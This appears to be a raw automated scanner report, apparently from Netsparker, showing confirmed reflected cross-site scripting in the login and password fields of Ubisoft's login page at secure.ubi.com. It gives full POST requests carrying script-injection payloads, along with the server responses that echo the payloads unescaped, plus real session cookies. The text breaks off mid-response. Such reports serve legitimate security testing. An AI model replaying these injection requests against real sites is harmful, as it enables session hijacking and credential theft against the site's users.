Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 189
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&login=3&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003E2)%3c%2fscript%3e&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13560


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name/password combination you entered is not correct. Double check the user name and password, then try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0003E2)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
- /login/Login.aspx

/login/Login.aspx CONFIRMED

https://secure.ubi.com/login/Login.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
login POST 3
password POST '"--></style></script><script>alert(0x0003E6)</script>
RememberPassword POST 1
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 256
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&login=3&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003E6)%3c%2fscript%3e&RememberPassword=1&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13560


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name/password combination you entered is not correct. Double check the user name and password, then try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0003E6)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
- /login/Login.aspx

/login/Login.aspx CONFIRMED

https://secure.ubi.com/login/Login.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
login POST '"--></style></script><script>alert(0x0003E5)</script>
password POST 3
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 237
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003E5)%3c%2fscript%3e&password=3&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13495


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
